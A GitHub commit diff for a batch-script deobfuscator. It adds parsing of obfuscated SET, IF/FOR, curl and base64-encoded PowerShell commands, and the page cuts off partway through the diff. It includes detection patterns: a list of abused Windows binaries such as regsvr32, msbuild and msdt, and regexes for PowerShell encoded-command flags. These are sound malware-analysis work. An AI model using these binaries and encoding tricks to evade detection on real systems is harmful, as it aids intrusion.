Skip to content

Commit f080599

Browse files
authoredOct 24, 2022
Merge pull request #3 from gdesmar/master
Major refactoring
2 parents c092642 + e5598ec commit f080599

File tree

3 files changed

+1371
-83
lines changed

3 files changed

+1371
-83
lines changed
 

‎batch_deobfuscator/batch_interpreter.py

+546-83
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,54 @@
1-
import re
21
import argparse
3-
import os
2+
import base64
43
import copy
4+
import hashlib
5+
import os
6+
import re
7+
import shlex
8+
import shutil
9+
import string
10+
import tempfile
11+
from collections import defaultdict
12+
from urllib.parse import urlparse
13+
14+
QUOTED_CHARS = ["|", ">", "<", '"', "^", "&"]
15+
16+
# Powershell detection
17+
ENC_RE = rb"(?i)(?:-|/)e(?:c|n(?:c(?:o(?:d(?:e(?:d(?:c(?:o(?:m(?:m(?:a(?:nd?)?)?)?)?)?)?)?)?)?)?)?)?$"
18+
PWR_CMD_RE = rb"(?i)(?:-|/)c(?:o(?:m(?:m(?:a(?:nd?)?)?)?)?)?$"
19+
20+
# Gathered from https://gist.github.com/api0cradle/8cdc53e2a80de079709d28a2d96458c2
21+
RARE_LOLBAS = [
22+
"forfiles",
23+
"bash",
24+
"scriptrunner",
25+
"syncappvpublishingserver",
26+
"hh.exe",
27+
"msbuild",
28+
"regsvcs",
29+
"regasm",
30+
"installutil",
31+
"ieexec",
32+
"msxsl",
33+
"odbcconf",
34+
"sqldumper",
35+
"pcalua",
36+
"appvlp",
37+
"runscripthelper",
38+
"infdefaultinstall",
39+
"diskshadow",
40+
"msdt",
41+
"regsvr32",
42+
]
543

644

745
class BatchDeobfuscator:
8-
def __init__(self):
46+
def __init__(self, complex_one_liner_threshold=4):
947
self.variables = {}
1048
self.exec_cmd = []
49+
self.exec_ps1 = []
50+
self.traits = defaultdict(list)
51+
self.complex_one_liner_threshold = complex_one_liner_threshold
1152
if os.name == "nt":
1253
for env_var, value in os.environ.items():
1354
self.variables[env_var.lower()] = value
@@ -22,6 +63,7 @@ def __init__(self):
2263
"computername": "MISCREANTTEARS",
2364
"comspec": "C:\\WINDOWS\\system32\\cmd.exe",
2465
"driverdata": "C:\\Windows\\System32\\Drivers\\DriverData",
66+
"errorlevel": "0", # Because nothing fails.
2567
"fps_browser_app_profile_string": "Internet Explorer",
2668
"fps_browser_user_profile_string": "Default",
2769
"homedrive": "C:",
@@ -32,7 +74,13 @@ def __init__(self):
3274
"number_of_processors": "4",
3375
"onedrive": "C:\\Users\\puncher\\OneDrive",
3476
"os": "Windows_NT",
35-
"path": "C:\\Program Files\\Amazon Corretto\\jdk11.0.7_10\\bin;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\dotnet\\;C:\\Program Files\\Microsoft SQL Server\\130\\Tools\\Binn\\;C:\\Users\\puncher\\AppData\\Local\\Microsoft\\WindowsApps;%USERPROFILE%\\AppData\\Local\\Microsoft\\WindowsApps;",
77+
"path": (
78+
"C:\\Program Files\\Amazon Corretto\\jdk11.0.7_10\\bin;C:\\WINDOWS\\system32;"
79+
"C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;"
80+
"C:\\Program Files\\dotnet\\;C:\\Program Files\\Microsoft SQL Server\\130\\Tools\\Binn\\;"
81+
"C:\\Users\\puncher\\AppData\\Local\\Microsoft\\WindowsApps;"
82+
"%USERPROFILE%\\AppData\\Local\\Microsoft\\WindowsApps;"
83+
),
3684
"pathext": ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC",
3785
"processor_architecture": "AMD64",
3886
"processor_identifier": "Intel Core Ti-83 Family 6 Model 158 Stepping 10, GenuineIntel",
@@ -44,6 +92,7 @@ def __init__(self):
4492
"programw6432": "C:\\Program Files",
4593
"psmodulepath": "C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\",
4694
"public": "C:\\Users\\Public",
95+
"random": "4", # https://xkcd.com/221/
4796
"sessionname": "Console",
4897
"systemdrive": "C:",
4998
"systemroot": "C:\\WINDOWS",
@@ -57,8 +106,26 @@ def __init__(self):
57106
"__compat_layer": "DetectorsMessageBoxErrors",
58107
}
59108

109+
# There are 211 lines coming out of curl --help, so I won't be parsing all the options
110+
self.curl_parser = argparse.ArgumentParser()
111+
self.curl_parser.add_argument("-o", "--output", dest="output", help="Write to file instead of stdout")
112+
self.curl_parser.add_argument(
113+
"-O",
114+
"--remote-name",
115+
dest="remote_name",
116+
action="store_true",
117+
help="Write output to a file named as the remote file",
118+
)
119+
self.curl_parser.add_argument("url", help="URL")
120+
# Patch all possible one-character arguments
121+
for char in string.ascii_letters + string.digits + "#:":
122+
try:
123+
self.curl_parser.add_argument(f"-{char}", action="store_true")
124+
except argparse.ArgumentError:
125+
pass
126+
60127
def read_logical_line(self, path):
61-
with open(path, "r", encoding="utf-8") as input_file:
128+
with open(path, "r", encoding="utf-8", errors="ignore") as input_file:
62129
logical_line = ""
63130
for line in input_file:
64131
if not line.endswith("^"):
@@ -68,18 +135,88 @@ def read_logical_line(self, path):
68135
else:
69136
logical_line += line + "\n"
70137

138+
def split_if_statement(self, statement):
    """Break an ``IF`` statement into its header, body and closing pieces.

    Yields, in order: the conditional header (always ending with ``(``),
    the command run when the condition holds, and then either a lone ``)``
    or the sequence ``") else ("``, the else-command, ``")"``. The case of
    the emitted ``else`` keyword follows the case of the matched ``if``
    keyword. When the statement does not look like an ``IF`` at all it is
    yielded back unchanged.

    Args:
        statement: A single command string expected to start with ``if``.

    Yields:
        The string fragments described above.
    """
    pattern = (
        r"(?P<conditional>(?P<if_statement>if)\s+(not\s+)?"
        r"(?P<type>errorlevel\s+\d+\s+|exist\s+(\".*\"|[^\s]+)\s+|.+?==.+?\s+|"
        r"(\/i\s+)?[^\s]+\s+(equ|neq|lss|leq|gtr|geq)\s+[^\s]+\s+|cmdextversion\s+\d\s+|defined\s+[^\s]+\s+)"
        r"(?P<open_paren>\()?)(?P<true_statement>[^\)]*)(?P<close_paren>\))?"
        r"(\s+else\s+(\()?\s*(?P<false_statement>[^\)]*)(\))?)?"
    )
    found = re.search(pattern, statement, re.IGNORECASE)
    if found is None:
        # Broken statement, maybe a re-run
        yield statement
        return

    pieces = found.groupdict()
    has_open_paren = pieces["open_paren"] is not None

    # Normalise the header so that it always opens a parenthesised body.
    yield pieces["conditional"] if has_open_paren else pieces["conditional"] + "("
    yield pieces["true_statement"]

    if pieces["false_statement"] is not None:
        # Got an ELSE statement; mirror the casing of the IF keyword.
        yield ") else (" if pieces["if_statement"] == "if" else ") ELSE ("
        yield pieces["false_statement"]
        yield ")"
    elif not has_open_paren or pieces["close_paren"] is not None:
        yield ")"
167+
168+
def split_for_statement(self, statement):
    """Break a ``FOR ... IN (...) DO ...`` statement into header, body and ``)``.

    Yields the loop header (always ending with ``(``), then the command
    that follows ``DO``, then a closing ``)`` unless the statement opened a
    parenthesis that was never closed. A statement that does not match the
    expected shape is yielded back unchanged.

    Args:
        statement: A single command string expected to start with ``for``.

    Yields:
        The string fragments described above.
    """
    pattern = (
        r"(?P<loop>(?P<for_statement>for)\s+"
        r"(?P<parameter>.+)"
        r"\s+IN\s+\((?P<in_set>[^\)]+)\)"
        r"\s+DO\s+"
        r"(?P<open_paren>\()?)(?P<command>[^\)]*)(?P<close_paren>\))?"
    )
    found = re.search(pattern, statement, re.IGNORECASE)
    if found is None:
        # Broken statement, maybe a re-run
        yield statement
        return

    pieces = found.groupdict()
    missing_open_paren = pieces["open_paren"] is None

    # Normalise the header so that it always opens a parenthesised body.
    yield pieces["loop"] + "(" if missing_open_paren else pieces["loop"]
    yield pieces["command"]
    if missing_open_paren or pieces["close_paren"] is not None:
        yield ")"
188+
189+
def get_commands_special_statement(self, statement):
    """Expand ``IF`` / ``FOR`` statements into their component commands.

    Statements starting with ``if `` or ``for `` (case-insensitive) are
    handed to the matching splitter and every non-blank fragment is
    yielded. Any other statement is yielded back untouched.

    Args:
        statement: A single command string.

    Yields:
        The fragments of the statement, or the statement itself.
    """
    lowered = statement.lower()
    if lowered.startswith("if "):
        splitter = self.split_if_statement
    elif lowered.startswith("for "):
        splitter = self.split_for_statement
    else:
        yield statement
        return

    for fragment in splitter(statement):
        # Whitespace-only fragments (e.g. an empty body) carry no command.
        if fragment.strip() != "":
            yield fragment
200+
71201
def get_commands(self, logical_line):
72202
state = "init"
73203
counter = 0
74204
start_command = 0
75205
for char in logical_line:
206+
# print(f"C:{char}, S:{state}")
76207
if state == "init": # init state
77208
if char == '"': # quote is on
78209
state = "str_s"
79210
elif char == "^":
80211
state = "escape"
212+
elif char == "&" and logical_line[counter - 1] == ">":
213+
# Usually an output redirection, we want to keep it on the same line
214+
pass
81215
elif char == "&" or char == "|":
82-
yield logical_line[start_command:counter].strip()
216+
cmd = logical_line[start_command:counter].strip()
217+
if cmd != "":
218+
for part in self.get_commands_special_statement(cmd):
219+
yield part
83220
start_command = counter + 1
84221
elif state == "str_s":
85222
if char == '"':
@@ -91,37 +228,187 @@ def get_commands(self, logical_line):
91228

92229
last_com = logical_line[start_command:].strip()
93230
if last_com != "":
94-
yield last_com
231+
for part in self.get_commands_special_statement(last_com):
232+
yield part
95233

96234
def get_value(self, variable):
    """Expand a ``%var%`` / ``!var!`` reference to its value.

    Handles plain look-ups, substring extraction
    (``%var:~index%`` / ``%var:~index,length%``) and substitution
    (``%var:search=replace%``, plus the ``*search`` form which replaces
    everything up to and including the first occurrence). Variable names
    and search strings are matched case-insensitively.

    Args:
        variable: Text containing the reference, delimiters included.

    Returns:
        The expanded value with trailing ``^`` characters stripped (a value
        that is exactly ``^`` is kept). When a referenced name is not in
        ``self.variables`` the value resolved so far is returned, which is
        an empty string for the first reference.
    """
    str_substitution = (
        r"([%!])(?P<variable>[\"^|!\w#$'()*+,-.?@\[\]`{}~\s+]+)"
        r"("
        r"(:~\s*(?P<index>[+-]?\d+)\s*(?:,\s*(?P<length>[+-]?\d+))?\s*)|"
        r"(:(?P<s1>[^=]+)=(?P<s2>[^=]*))"
        r")?(\1)"
    )

    value = ""

    for match in re.finditer(str_substitution, variable, re.MULTILINE):
        var_name = match.group("variable").lower()
        if var_name not in self.variables:
            # It should be "variable", and interpret the empty echo later, but that would need a better simulator
            return value

        value = self.variables[var_name]
        if match.group("index") is not None:
            index = int(match.group("index"))
            if index < 0 and -index >= len(value):
                # A negative offset reaching past the start clamps to the start.
                index = 0
            elif index < 0:
                index = len(value) + index
            if match.group("length") is not None:
                length = int(match.group("length"))
            else:
                length = len(value) - index
            if length >= 0:
                value = value[index : index + length]
            else:
                # A negative length means "stop that many characters before the end".
                value = value[index:length]
        elif match.group("s1") is not None:
            s1 = match.group("s1")
            s2 = match.group("s2")
            if s1.startswith("*") and s1[1:].lower() in value.lower():
                value = f"{s2}{value[value.lower().index(s1[1:].lower())+len(s1)-1:]}"
            else:
                pattern = re.compile(re.escape(s1), re.IGNORECASE)
                # Use a callable so the replacement is inserted literally:
                # re.escape() is meant for patterns, and applying it to the
                # replacement text leaks backslashes into the result.
                value = pattern.sub(lambda _match: s2, value)

    if value == "^":
        return value
    return value.rstrip("^")
281+
282+
def interpret_set(self, cmd):
283+
state = "init"
284+
option = None
285+
var_name = ""
286+
var_value = ""
287+
quote = None
288+
old_state = None
289+
stop_parsing = len(cmd)
290+
291+
for idx, char in enumerate(cmd):
292+
# print(f"{idx}. C: {char} S: {state}, {var_value}")
293+
if idx >= stop_parsing:
294+
break
295+
if state == "init":
296+
if char == " ":
297+
continue
298+
elif char == "/":
299+
state = "option"
300+
elif char == '"':
301+
quote = '"'
302+
stop_parsing = cmd.rfind('"')
303+
if idx == stop_parsing:
304+
stop_parsing = len(cmd)
305+
state = "var"
306+
elif char == "^":
307+
old_state = state
308+
state = "escape"
116309
else:
117-
# if variable name is not set, return the variable
118-
# value = variable
119-
return value
310+
state = "var"
311+
var_name += char
312+
elif state == "option":
313+
option = char.lower()
314+
state = "init"
315+
elif state == "var":
316+
if char == "=":
317+
state = "value"
318+
elif not quote and char == '"':
319+
quote = '"'
320+
var_name += char
321+
elif char == "^":
322+
old_state = state
323+
state = "escape"
324+
else:
325+
var_name += char
326+
elif state == "value":
327+
if char == "^":
328+
old_state = state
329+
state = "escape"
330+
else:
331+
var_value += char
332+
elif state == "escape":
333+
if old_state == "init":
334+
if char == '"':
335+
quote = '^"'
336+
stop_parsing = cmd.rfind('"')
337+
if idx == stop_parsing:
338+
stop_parsing = len(cmd)
339+
state = "init"
340+
old_state = None
341+
else:
342+
state = "var"
343+
var_name += char
344+
old_state = None
345+
elif old_state == "var":
346+
if quote == '"' and char in QUOTED_CHARS:
347+
var_name += "^"
348+
if not quote and char == '"':
349+
quote = '^"'
350+
var_name += char
351+
state = old_state
352+
old_state = None
353+
elif old_state == "value":
354+
var_value += char
355+
state = old_state
356+
old_state = None
357+
358+
if option == "a":
359+
var_name = var_name.strip(" ")
360+
for char in QUOTED_CHARS:
361+
var_name = var_name.replace(char, "")
362+
var_value = f"({var_value.strip(' ')})"
363+
elif option == "p":
364+
var_value = "__input__"
365+
366+
var_name = var_name.lstrip(" ")
367+
if not quote:
368+
var_name = var_name.lstrip('^"').replace('^"', '"')
369+
370+
return (var_name, var_value)
371+
372+
def interpret_curl(self, cmd):
    """Record the source URL and destination of a ``curl`` download.

    The command line is tokenised and parsed with ``self.curl_parser``; on
    success a ``(cmd, {"src": url, "dst": destination})`` tuple is appended
    to ``self.traits["download"]``. ``dst`` is the ``--output`` value, or
    the basename of the URL path when ``--remote-name`` is set. Command
    lines that cannot be tokenised or parsed are ignored.

    Args:
        cmd: The full ``curl`` command line.
    """
    # Batch specific obfuscation that is not handled before for echo/variable purposes, can be stripped here
    cmd = cmd.replace('""', "")
    try:
        split_cmd = shlex.split(cmd, posix=False)
    except ValueError:
        # Unbalanced quotes: nothing reliable can be extracted.
        return

    try:
        args, _unknown = self.curl_parser.parse_known_args(split_cmd[1:])
    except SystemExit:
        # argparse reports usage errors (e.g. no URL) by calling sys.exit();
        # a malformed sample must not terminate the whole analysis.
        return

    dst = args.output
    if args.remote_name:
        dst = os.path.basename(urlparse(args.url).path)

    self.traits["download"].append((cmd, {"src": args.url, "dst": dst}))
383+
384+
def interpret_powershell(self, normalized_comm):
    """Extract the script passed to ``powershell`` and queue it in ``self.exec_ps1``.

    The command line is tokenised twice (as-is and lower-cased). The first
    token matching ``ENC_RE`` has its following argument base64-decoded
    with NUL bytes removed; the first token matching ``PWR_CMD_RE`` has its
    following argument taken verbatim. If neither flag is present the last
    token is used. Surrounding double quotes are stripped from the payload.

    Command lines that cannot be tokenised, flags with no following
    argument, and payloads that are not valid base64 are ignored.

    Args:
        normalized_comm: The normalised ``powershell`` command line.
    """
    try:
        ori_cmd = shlex.split(normalized_comm)
        cmd = shlex.split(normalized_comm.lower())
    except ValueError:
        return

    if not ori_cmd:
        return

    ps1_cmd = None
    for idx, part in enumerate(cmd):
        token = part.encode()
        is_encoded = re.match(ENC_RE, token) is not None
        if not is_encoded and re.match(PWR_CMD_RE, token) is None:
            continue

        if idx + 1 >= len(ori_cmd):
            # The flag is the last token: there is no payload to extract.
            return

        payload = ori_cmd[idx + 1]
        if is_encoded:
            try:
                ps1_cmd = base64.b64decode(payload).replace(b"\x00", b"")
            except ValueError:
                # binascii.Error (invalid base64) is a ValueError subclass.
                return
        else:
            ps1_cmd = payload.encode()
        break

    if ps1_cmd is None:
        ps1_cmd = ori_cmd[-1].encode()

    if ps1_cmd:
        self.exec_ps1.append(ps1_cmd.strip(b'"'))
122404

123405
def interpret_command(self, normalized_comm):
124-
normalized_comm = normalized_comm.strip()
406+
if normalized_comm[:3].lower() == "rem":
407+
return
408+
409+
# We need to keep the last space in case the command is "set EXP=43 " so that the value will be "43 "
410+
# normalized_comm = normalized_comm.strip()
411+
125412
# remove parentheses
126413
index = 0
127414
last = len(normalized_comm) - 1
@@ -135,58 +422,98 @@ def interpret_command(self, normalized_comm):
135422
index += 1
136423
normalized_comm = normalized_comm[index : last + 1]
137424

138-
if normalized_comm.lower().startswith("cmd"):
139-
set_command = r"\s*(call)?cmd(.exe)?\s*((\/A|\/U|\/Q|\/D)\s+|((\/E|\/F|\/V):(ON|OFF))\s*)*(\/c|\/r)\s*(?P<cmd>.*)"
140-
match = re.search(set_command, normalized_comm, re.IGNORECASE)
425+
if not normalized_comm:
426+
return
427+
428+
if normalized_comm[0] == "@":
429+
normalized_comm = normalized_comm[1:]
430+
431+
normalized_comm_lower = normalized_comm.lower()
432+
if normalized_comm_lower.startswith("call"):
433+
# TODO: Not a perfect interpretation as the @ sign of the recursive command shouldn't be removed
434+
# This shouldn't work:
435+
# call @set EXP=43
436+
# But this should:
437+
# call set EXP=43
438+
self.interpret_command(normalized_comm[5:])
439+
return
440+
441+
if normalized_comm_lower.startswith("start"):
442+
start_re = (
443+
r"start(.exe)?"
444+
r"(\/min|\/max|\/wait|\/low|\/normal|\/abovenormal|\/belownormal|\/high|\/realtime|\/b|\/i|\/w|\s+)*"
445+
# TODO: Add Node + Affinity options
446+
# TODO: Add title + path keys
447+
r"(?P<cmd>.*)"
448+
)
449+
match = re.match(start_re, normalized_comm, re.IGNORECASE)
141450
if match is not None and match.group("cmd") is not None:
142-
cmd = match.group("cmd").strip('"')
143-
self.exec_cmd.append(cmd)
451+
self.interpret_command(match.group("cmd"))
452+
return
144453

145-
else:
454+
if normalized_comm_lower.startswith("cmd"):
455+
cmd_command = r"cmd(.exe)?\s*((\/A|\/U|\/Q|\/D)\s+|((\/E|\/F|\/V):(ON|OFF))\s*)*(\/c|\/r)\s*(?P<cmd>.*)"
456+
match = re.search(cmd_command, normalized_comm, re.IGNORECASE)
457+
if match is not None and match.group("cmd") is not None:
458+
self.exec_cmd.append(match.group("cmd").strip('"'))
459+
return
460+
461+
if normalized_comm_lower.startswith("setlocal"):
462+
# Just so we don't go into the set command
463+
return
464+
465+
if normalized_comm_lower.startswith("set"):
146466
# interpreting set command
147-
set_command = (
148-
r"(\s*(call)?\s*set\s+\"?(?P<var>[A-Za-z0-9#$'()*+,-.?@\[\]_`{}~ ]+)=\s*(?P<val>[^\"\n]*)\"?)|"
149-
r"(\s*(call)?\s*set\s+/p\s+\"?(?P<input>[A-Za-z0-9#$'()*+,-.?@\[\]_`{}~ ]+)=[^\"\n]*\"?)"
150-
)
151-
match = re.search(set_command, normalized_comm, re.IGNORECASE)
152-
if match is not None:
153-
if match.group("input") is not None:
154-
self.variables[match.group("input")] = "__input__"
155-
else:
156-
self.variables[match.group("var").lower()] = match.group("val")
467+
var_name, var_value = self.interpret_set(normalized_comm[3:])
468+
if var_value == "":
469+
if var_name.lower() in self.variables:
470+
del self.variables[var_name.lower()]
471+
else:
472+
self.variables[var_name.lower()] = var_value
473+
return
474+
475+
if normalized_comm_lower.startswith("curl"):
476+
self.interpret_curl(normalized_comm)
477+
478+
if normalized_comm_lower.startswith("powershell"):
479+
self.interpret_powershell(normalized_comm)
157480

158481
# pushdown automata
159482
def normalize_command(self, command):
483+
if command[:3].lower() == "rem":
484+
return command
485+
160486
state = "init"
161-
counter = 0
162487
normalized_com = ""
163488
stack = []
489+
traits = {"start_with_var": False, "var_used": 0}
164490
for char in command:
491+
# print(f"C:{char} S:{state} N:{normalized_com}")
165492
if state == "init": # init state
166493
if char == '"': # quote is on
167494
state = "str_s"
168495
if normalized_com and normalized_com[-1] == '"':
169496
normalized_com = normalized_com[:-1]
170497
else:
171498
normalized_com += char
172-
elif char == "," or char == ";" or char == "\t":
499+
elif char == "," or char == ";": # or char == "\t": EDIT: How about we keep those tabs?
173500
# commas (",") are replaced by spaces, unless they are part of a string in doublequotes
174501
# semicolons (";") are replaced by spaces, unless they are part of a string in doublequotes
175502
# tabs are replaced by a single space
176503
# http://www.robvanderwoude.com/parameters.php
177504
normalized_com += " "
178505
elif char == "^": # next character must be escaped
506+
stack.append(state)
179507
state = "escape"
180-
stack.append("init")
181508
elif char == "%": # variable start
182509
variable_start = len(normalized_com)
183-
normalized_com += "%"
184-
stack.append("init")
510+
normalized_com += char
511+
stack.append(state)
185512
state = "var_s"
186513
elif char == "!":
187514
variable_start = len(normalized_com)
188-
normalized_com += "%"
189-
stack.append("init")
515+
normalized_com += char
516+
stack.append(state)
190517
state = "var_s_2"
191518
else:
192519
normalized_com += char
@@ -196,12 +523,12 @@ def normalize_command(self, command):
196523
normalized_com += char
197524
elif char == "%":
198525
variable_start = len(normalized_com)
199-
normalized_com += "%"
526+
normalized_com += char
200527
stack.append("str_s")
201528
state = "var_s" # seen %
202529
elif char == "!":
203530
variable_start = len(normalized_com)
204-
normalized_com += "%"
531+
normalized_com += char
205532
stack.append("str_s")
206533
state = "var_s_2" # seen !
207534
elif char == "^":
@@ -210,58 +537,192 @@ def normalize_command(self, command):
210537
else:
211538
normalized_com += char
212539
elif state == "var_s":
213-
if char == "%" and normalized_com[-1] != "%":
214-
normalized_com += "%"
215-
# print('<substring>{}</substring>'.format(command[variable_start:counter + 1]), end='')
216-
value = self.get_value(normalized_com[variable_start:].lower())
540+
if char == "%" and normalized_com[-1] != char:
541+
normalized_com += char
542+
value = self.get_value(normalized_com[variable_start:])
217543
normalized_com = normalized_com[:variable_start]
218-
normalized_com += value
544+
if len(normalized_com) == 0:
545+
traits["start_with_var"] = True
546+
normalized_com += self.normalize_command(value)
547+
traits["var_used"] += 1
219548
state = stack.pop()
220-
elif char == "%":
549+
elif char == "%": # Two % in a row
221550
normalized_com += char
222-
variable_start = counter
223-
elif char == '"':
224-
if stack[-1] == "str_s":
225-
normalized_com += char
226-
stack.pop()
227-
state = "init"
228-
else:
229-
normalized_com += char
551+
state = stack.pop()
230552
elif char == "^":
231-
state = "escape"
232-
stack.append("var_s")
553+
# Do not escape in vars?
554+
# state = "escape"
555+
# stack.append("var_s")
556+
normalized_com += char
557+
elif char == "*" and len(normalized_com) == variable_start + 1:
558+
# Assume no parameter were passed
559+
normalized_com = normalized_com[:variable_start]
560+
state = stack.pop()
561+
elif char.isdigit() and normalized_com[variable_start:] in [
562+
"%",
563+
"%~",
564+
"%~f",
565+
"%~d",
566+
"%~p",
567+
"%~n",
568+
"%~x",
569+
"%~s",
570+
"%~a",
571+
"%~t",
572+
"%~z",
573+
]:
574+
# https://www.programming-books.io/essential/batch/-percent-tilde-f4263820c2db41e399c77259970464f1.html
575+
# TODO: Better handling of letter combination (i.e. %~xsa0)
576+
# Could also return different values of script.bat if we want to parse the options
577+
normalized_com += char
578+
if char == "0":
579+
value = "script.bat"
580+
else:
581+
value = "" # Assume no parameter were passed
582+
normalized_com = normalized_com[:variable_start]
583+
normalized_com += value
584+
state = stack.pop()
233585
else:
234586
normalized_com += char
235587
elif state == "var_s_2":
236-
if char == "!" and normalized_com[-1] != "%":
237-
normalized_com += "%"
238-
# print('<substring>{}</substring>'.format(command[variable_start:counter + 1]), end='')
239-
value = self.get_value(normalized_com[variable_start:].lower())
588+
if char == "!" and normalized_com[-1] != char:
589+
normalized_com += char
590+
value = self.get_value(normalized_com[variable_start:])
240591
normalized_com = normalized_com[:variable_start]
241-
normalized_com += value
592+
if len(normalized_com) == 0:
593+
traits["start_with_var"] = True
594+
normalized_com += self.normalize_command(value)
595+
traits["var_used"] += 1
242596
state = stack.pop()
243597
elif char == "!":
244598
normalized_com += char
245-
variable_start = counter
246-
elif char == '"':
247-
if stack[-1] == "str_s":
248-
normalized_com += char
249-
stack.pop()
250-
state = "init"
251-
else:
252-
normalized_com += char
253599
elif char == "^":
254600
state = "escape"
255-
stack.append("var_s")
601+
stack.append("var_s_2")
256602
else:
257603
normalized_com += char
258604
elif state == "escape":
605+
if char in QUOTED_CHARS:
606+
normalized_com += "^"
259607
normalized_com += char
260608
state = stack.pop()
609+
if char == "%":
610+
if state == "var_s":
611+
value = self.get_value(normalized_com[variable_start:])
612+
normalized_com = normalized_com[:variable_start]
613+
if len(normalized_com) == 0:
614+
traits["start_with_var"] = True
615+
normalized_com += self.normalize_command(value)
616+
traits["var_used"] += 1
617+
state = stack.pop()
618+
else:
619+
variable_start = len(normalized_com) - 1
620+
stack.append(state)
621+
state = "var_s"
622+
elif char == "!":
623+
if state == "var_s_2":
624+
value = self.get_value(normalized_com[variable_start:])
625+
normalized_com = normalized_com[:variable_start]
626+
if len(normalized_com) == 0:
627+
traits["start_with_var"] = True
628+
normalized_com += self.normalize_command(value)
629+
traits["var_used"] += 1
630+
state = stack.pop()
631+
else:
632+
variable_start = len(normalized_com) - 1
633+
stack.append(state)
634+
state = "var_s_2"
635+
636+
if state in ["var_s", "var_s_2"]:
637+
normalized_com = normalized_com[:variable_start] + normalized_com[variable_start + 1 :]
638+
if state == "escape":
639+
normalized_com += "^"
640+
641+
if traits["start_with_var"]:
642+
self.traits["start_with_var"].append((command, normalized_com))
643+
self.traits["var_used"].append((command, normalized_com, traits["var_used"]))
261644

262-
counter += 1
263645
return normalized_com
264646

647+
def analyze_logical_line(self, logical_line, working_directory, f, extracted_files):
    """Normalise, interpret and record every command of one logical line.

    Each command is normalised. If the normalised text itself splits into
    several commands it is recorded under the ``command-grouping`` trait
    and analysed recursively. Otherwise the command is interpreted, written
    to ``f`` followed by a newline, and checked against ``RARE_LOLBAS``.
    Child ``cmd`` invocations collected in ``self.exec_cmd`` are analysed
    with a deep copy of this object and saved as
    ``<sha256 prefix>.bat``; PowerShell payloads in ``self.exec_ps1`` are
    saved as ``<sha256 prefix>.ps1`` unless a payload with the same hash
    was already extracted.

    Args:
        logical_line: The logical line to analyse.
        working_directory: Directory receiving the extracted files.
        f: Writable text file object receiving the normalised commands.
        extracted_files: Mapping with ``"batch"`` and ``"powershell"`` lists
            of ``(filename, sha256)`` tuples; updated in place.
    """
    for command in self.get_commands(logical_line):
        normalized_comm = self.normalize_command(command)
        if len(list(self.get_commands(normalized_comm))) > 1:
            self.traits["command-grouping"].append({"Command": command, "Normalized": normalized_comm})
            self.analyze_logical_line(normalized_comm, working_directory, f, extracted_files)
            continue

        self.interpret_command(normalized_comm)
        f.write(normalized_comm)
        f.write("\n")
        for lolbas in RARE_LOLBAS:
            if lolbas in normalized_comm:
                self.traits["LOLBAS"].append({"LOLBAS": lolbas, "Command": normalized_comm})

        if len(self.exec_cmd) > 0:
            for child_cmd in self.exec_cmd:
                child_deobfuscator = copy.deepcopy(self)
                child_deobfuscator.exec_cmd.clear()
                child_fd, child_path = tempfile.mkstemp(suffix=".bat", prefix="child_", dir=working_directory)
                # mkstemp() hands back an open descriptor; wrap it instead of
                # reopening the path so the descriptor is closed and not leaked.
                with os.fdopen(child_fd, "w") as child_f:
                    child_deobfuscator.analyze_logical_line(
                        child_cmd, working_directory, child_f, extracted_files
                    )
                with open(child_path, "rb") as cmd_f:
                    sha256hash = hashlib.sha256(cmd_f.read()).hexdigest()
                bat_filename = f"{sha256hash[0:10]}.bat"
                shutil.move(child_path, os.path.join(working_directory, bat_filename))
                extracted_files["batch"].append((bat_filename, sha256hash))
            self.exec_cmd.clear()

        if len(self.exec_ps1) > 0:
            for child_ps1 in self.exec_ps1:
                sha256hash = hashlib.sha256(child_ps1).hexdigest()
                if any(
                    extracted_file_hash == sha256hash
                    for _, extracted_file_hash in extracted_files.get("powershell", [])
                ):
                    # Same payload already written out; skip the duplicate.
                    continue
                powershell_filename = f"{sha256hash[0:10]}.ps1"
                powershell_file_path = os.path.join(working_directory, powershell_filename)
                with open(powershell_file_path, "wb") as ps1_f:
                    ps1_f.write(child_ps1)
                extracted_files["powershell"].append((powershell_filename, sha256hash))
            self.exec_ps1.clear()
690+
691+
def analyze(self, file_path, working_directory):
    """Deobfuscate a batch file and write the result to ``working_directory``.

    Every logical line of ``file_path`` is analysed and the normalised
    output is written to a temporary ``deobfuscated_bat.bat``, which is
    then renamed to ``<sha256 prefix>_deobfuscated.bat``. The
    ``one-liner`` trait is set when the input has exactly one non-blank
    line; for such inputs ``complex-one-liner`` records the number of
    output lines when it reaches ``self.complex_one_liner_threshold``.

    Args:
        file_path: Path of the batch file to analyse.
        working_directory: Directory receiving the output files.

    Returns:
        A ``(bat_filename, extracted_files)`` tuple: the name of the
        deobfuscated file and the mapping of extracted child files.
    """
    extracted_files = defaultdict(list)
    temp_path = os.path.join(working_directory, "deobfuscated_bat.bat")

    with open(temp_path, "w") as out_file:
        for logical_line in self.read_logical_line(file_path):
            self.analyze_logical_line(logical_line, working_directory, out_file, extracted_files)

    # Figure out if we're dealing with a Complex One-Liner
    # Ignore empty lines to determine if it is a One-Liner
    self.traits["one-liner"] = False
    non_blank_lines = 0
    with open(file_path, "r", encoding="utf-8", errors="ignore") as in_file:
        for line in in_file:
            if not line.strip():
                continue
            non_blank_lines += 1
            if non_blank_lines > 1:
                # A second non-blank line settles it; no need to read further.
                break
    self.traits["one-liner"] = non_blank_lines == 1

    with open(temp_path, "rb") as result_file:
        deobfuscated_data = result_file.read()

    if self.traits["one-liner"]:
        resulting_line_count = deobfuscated_data.count(b"\n")
        if resulting_line_count >= self.complex_one_liner_threshold:
            self.traits["complex-one-liner"] = resulting_line_count

    sha256hash = hashlib.sha256(deobfuscated_data).hexdigest()
    bat_filename = f"{sha256hash[0:10]}_deobfuscated.bat"
    shutil.move(temp_path, os.path.join(working_directory, bat_filename))

    return bat_filename, extracted_files
725+
265726

266727
def interpret_logical_line(deobfuscator, logical_line, tab=""):
267728
commands = deobfuscator.get_commands(logical_line)
@@ -270,12 +731,13 @@ def interpret_logical_line(deobfuscator, logical_line, tab=""):
270731
deobfuscator.interpret_command(normalized_comm)
271732
print(tab + normalized_comm)
272733
if len(deobfuscator.exec_cmd) > 0:
273-
